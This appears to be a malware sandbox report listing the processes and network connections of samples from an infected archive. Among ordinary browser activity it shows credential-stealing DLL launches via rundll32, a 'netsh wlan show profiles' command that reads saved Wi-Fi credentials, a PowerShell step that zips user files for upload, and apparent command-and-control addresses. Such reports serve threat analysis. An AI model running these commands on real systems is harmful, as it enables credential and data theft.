"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe"

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Windows\system32\wscript.EXE

C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js"

C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr

"C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\Admin\AppData\Local\Secure360 Innovations\V"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe

"C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfbd3cc40,0x7ffdfbd3cc4c,0x7ffdfbd3cc58

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\565375082730_Desktop.zip' -CompressionLevel Optimal

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3280,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3264 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1816,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3676 /prefetch:3

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1820,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3712 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2656,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3860 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2648,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3972 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4396 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3872,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4720 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe

"C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4916,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4912 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1904,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=5028 /prefetch:8

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b735857d-e559-49b6-b15c-b9318ed9a008} 6780 "\\.\pipe\gecko-crash-server-pipe.6780" gpu

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 cxcs.microsoft.net udp
DE 23.42.30.141:443 cxcs.microsoft.net tcp
US 95.101.136.201:443 www.bing.com tcp
US 8.8.8.8:53 201.136.101.95.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
NL 85.31.47.154:80 85.31.47.154 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
TH 45.141.26.234:80 45.141.26.234 tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
FI 37.27.43.98:443 tcp
AE 62.60.226.24:80 62.60.226.24 tcp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 176.113.115.33:80 176.113.115.33 tcp
US 208.95.112.1:80 ip-api.com tcp
TH 185.84.161.186:80 185.84.161.186 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 69.49.234.173:443 haramb.net tcp
CN 101.200.220.118:8090 tcp
DE 23.42.16.93:443 steamcommunity.com tcp
N/A 224.0.0.251:5353 udp
TH 45.141.26.234:7000 tcp
TH 185.84.161.186:80 185.84.161.186 tcp
CO 181.131.217.244:30203 navegacionseguracol24vip.org tcp
CN 47.92.31.237:8088 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 cxlugg.sbs udp
DE 23.42.16.93:443 steamcommunity.com tcp
FI 37.27.43.98:443 tcp
US 8.8.8.8:53 condedqpwqm.shop udp
US 172.67.69.226:443 ipapi.co tcp
DE 23.42.16.93:443 steamcommunity.com tcp
US 162.159.128.233:443 discord.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
CO 181.131.217.244:30203 navegacionseguracol24vip.org tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 172.67.69.226:443 ipapi.co tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 172.67.69.226:443 ipapi.co tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 172.67.69.226:443 ipapi.co tcp
US 162.159.128.233:443 discord.com tcp
CO 181.131.217.244:30203 navegacionseguracol24vip.org tcp
CN 120.24.38.217:4433 tcp
CO 181.131.217.244:30203 navegacionseguracol24vip.org tcp
NL 104.110.240.59:443 www.bing.com tcp
NL 104.110.240.59:443 www.bing.com tcp
GB 2.18.27.76:443 r.bing.com tcp
GB 2.18.27.76:443 r.bing.com tcp
GB 2.18.27.76:443 r.bing.com tcp
GB 2.18.27.76:443 r.bing.com tcp
HK 47.238.103.180:54322 47.238.103.180 tcp
IE 20.190.159.75:443 login.microsoftonline.com tcp
US 8.8.8.8:53 180.103.238.47.in-addr.arpa udp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
FR 172.217.18.195:443 recaptcha.net tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
CO 181.131.217.244:30203 3diciembre.con-ip.com tcp
FR 172.217.18.195:443 recaptcha.net udp
US 8.8.8.8:53 170.201.250.142.in-addr.arpa udp
US 8.8.8.8:53 163.20.217.172.in-addr.arpa udp
FR 172.217.20.164:443 www.google.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
RU 185.81.68.147:443 185.81.68.147 tcp
CN 101.37.34.164:9000 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:1912 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 216.239.32.36:443 region1.google-analytics.com udp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:1912 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
CN 47.94.168.145:9999 tcp
DE 193.161.193.99:35184 tcp
GB 104.86.110.120:443 tcp
US 20.42.65.90:443 browser.pipe.aria.microsoft.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
US 67.205.154.243:35184 tcp
NL 104.110.240.59:443 r.bing.com tcp
TH 85.203.4.238:80 85.203.4.238 tcp
DE 193.161.193.99:35184 tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
FR 172.217.18.195:443 recaptcha.net tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 67.205.154.243:35184 tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.113:443 r.bing.com tcp
NL 104.110.240.113:443 r.bing.com tcp
NL 104.110.240.59:443 r.bing.com tcp
NL 104.110.240.59:443 r.bing.com tcp
CN 183.57.21.131:8095 tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
RU 176.122.27.90:9999 176.122.27.90 tcp
CN 101.37.34.164:9000 tcp
RU 176.122.27.90:8888 tcp
US 8.8.8.8:53 90.27.122.176.in-addr.arpa udp
DE 193.161.193.99:35184 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
N/A 127.0.0.1:51822 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 67.205.154.243:35184 tcp
DE 193.161.193.99:35184 tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
US 8.8.8.8:53 eveezueigohehla.co udp
RU 185.215.113.66:80 eveezueigohehla.co tcp
CN 101.35.141.80:8443 tcp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 67.205.154.243:35184 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 JzyWtlVaDZyw.JzyWtlVaDZyw udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 cxlugg.sbs udp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
DE 193.161.193.99:35184 tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
US 162.159.128.233:443 discord.com tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 45.112.123.126:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
RU 185.215.113.66:80 eveezueigohehla.co tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 126.123.112.45.in-addr.arpa udp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
N/A 127.0.0.1:52859 tcp
US 8.8.8.8:53 r11.o.lencr.org udp
NL 92.123.77.34:80 r11.o.lencr.org tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 245.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 61.45.26.184.in-addr.arpa udp
US 8.8.8.8:53 34.77.123.92.in-addr.arpa udp
RU 185.215.113.66:80 eveezueigohehla.co tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
N/A 127.0.0.1:52868 tcp
N/A 127.0.0.1:52877 tcp
N/A 127.0.0.1:52882 tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 67.205.154.243:35184 tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
N/A 127.0.0.1:52886 tcp
N/A 127.0.0.1:52889 tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
DE 193.161.193.99:35184 tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
KR 119.193.158.215:80 119.193.158.215 tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 215.158.193.119.in-addr.arpa udp
US 67.205.154.243:35184 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
RU 188.119.66.185:443 tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 185.66.119.188.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 millyscroqwp.shop udp
US 8.8.8.8:53 locatedblsoqp.shop udp
US 8.8.8.8:53 traineiwnqo.shop udp
US 8.8.8.8:53 condedqpwqm.shop udp
US 8.8.8.8:53 evoliutwoqm.shop udp
US 8.8.8.8:53 stagedchheiqwo.shop udp
US 8.8.8.8:53 JzyWtlVaDZyw.JzyWtlVaDZyw udp
US 8.8.8.8:53 blank-3st7o.in udp
CN 119.23.208.137:60001 tcp
US 8.8.8.8:53 bgteamtestapp.azurewebsites.net udp
US 8.8.8.8:53 stamppreewntnq.shop udp
US 52.173.134.115:80 bgteamtestapp.azurewebsites.net tcp
US 8.8.8.8:53 caffegclasiqwp.shop udp
US 8.8.8.8:53 steamcommunity.com udp
DE 23.42.16.93:443 steamcommunity.com tcp
US 8.8.8.8:53 ip-api.com udp
DE 193.161.193.99:35184 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 115.134.173.52.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 www.seetrol.com udp
US 8.8.8.8:53 gstatic.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
KR 139.150.75.206:80 www.seetrol.com tcp
FR 142.250.74.227:443 gstatic.com tcp
US 8.8.8.8:53 227.74.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.75.150.139.in-addr.arpa udp
KR 3.36.173.8:50500 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
GB 20.26.156.215:443 github.com tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 67.205.154.243:35184 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 20.109.209.108:80 www.update.microsoft.com tcp
DE 193.161.193.99:35184 tcp
IR 5.234.67.61:40500 tcp
SY 95.212.73.0:40500 udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 142.250.179.74:443 content-autofill.googleapis.com tcp
US 67.205.154.243:35184 tcp
KZ 92.47.143.122:40500 udp
FR 172.217.20.206:443 clients2.google.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 163.181.154.238:443 ldcdn.ldmnq.com tcp
PK 210.56.13.114:80 210.56.13.114 tcp
NL 190.2.142.115:80 download.emailorganizer.com tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
RU 185.215.113.209:80 185.215.113.209 tcp
US 20.41.62.11:80 g.ceipmsn.com tcp
YE 134.35.104.95:40500 udp
KR 3.36.173.8:50500 tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
US 20.41.62.11:80 g.ceipmsn.com tcp
US 52.173.134.115:443 bingwallpaper.microsoft.com tcp
US 13.107.246.64:443 bingwallpaperimages.azureedge.net tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
CO 181.131.217.244:1515 newstaticfreepoint24.ddns-ip.net tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
AO 102.219.187.80:40500 udp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
FR 142.250.179.74:443 content-autofill.googleapis.com tcp
CN 8.134.170.90:7777 tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
US 67.205.154.243:35184 tcp
US 148.163.102.170:4782 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
GB 20.26.156.215:443 github.com tcp
FI 37.27.43.98:443 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
IR 2.185.189.167:40500 udp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 20.223.54.233:443 links.duckduckgo.com tcp
US 8.8.8.8:53 233.54.223.20.in-addr.arpa udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 external-content.duckduckgo.com udp
FR 142.250.75.234:443 ajax.googleapis.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.18.10.207:443 stackpath.bootstrapcdn.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
US 185.199.109.153:443 lipis.github.io tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
US 185.199.109.153:443 lipis.github.io tcp
CN 221.231.39.69:80 windriversfiles.imeitools.com tcp
DE 193.161.193.99:35184 tcp
US 148.163.102.170:4782 tcp
DZ 41.102.19.3:40500 udp
US 162.159.136.232:443 discord.com tcp
US 104.26.13.205:443 api.ipify.org tcp
UZ 217.30.162.244:40500 tcp
FR 45.112.123.126:443 api.gofile.io tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
GB 184.25.193.234:443 www.microsoft.com tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
IR 151.241.114.78:40500 udp
US 162.159.136.232:443 discord.com tcp
US 67.205.154.243:35184 tcp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 148.163.102.170:4782 tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
KR 3.36.173.8:50500 tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
RU 83.239.55.170:40500 udp
US 162.159.136.232:443 discord.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
US 162.159.136.232:443 discord.com tcp
KR 3.36.173.8:50500 tcp
DE 193.161.193.99:35184 tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
RU 188.119.66.185:443 tcp
US 148.163.102.170:4782 tcp
US 162.159.136.232:443 discord.com tcp
RU 31.41.244.12:80 31.41.244.12 tcp
NL 31.214.157.206:2024 tcp
US 162.159.136.232:443 discord.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
US 162.159.136.232:443 discord.com tcp
HK 154.92.19.29:1231 154.92.19.29 tcp
US 162.159.136.232:443 discord.com tcp
IR 5.134.199.85:40500 udp
NL 149.154.167.99:443 t.me tcp
US 162.159.136.232:443 discord.com tcp
DE 23.42.16.93:443 steamcommunity.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
NL 149.154.167.99:443 t.me tcp
US 67.205.154.243:35184 tcp
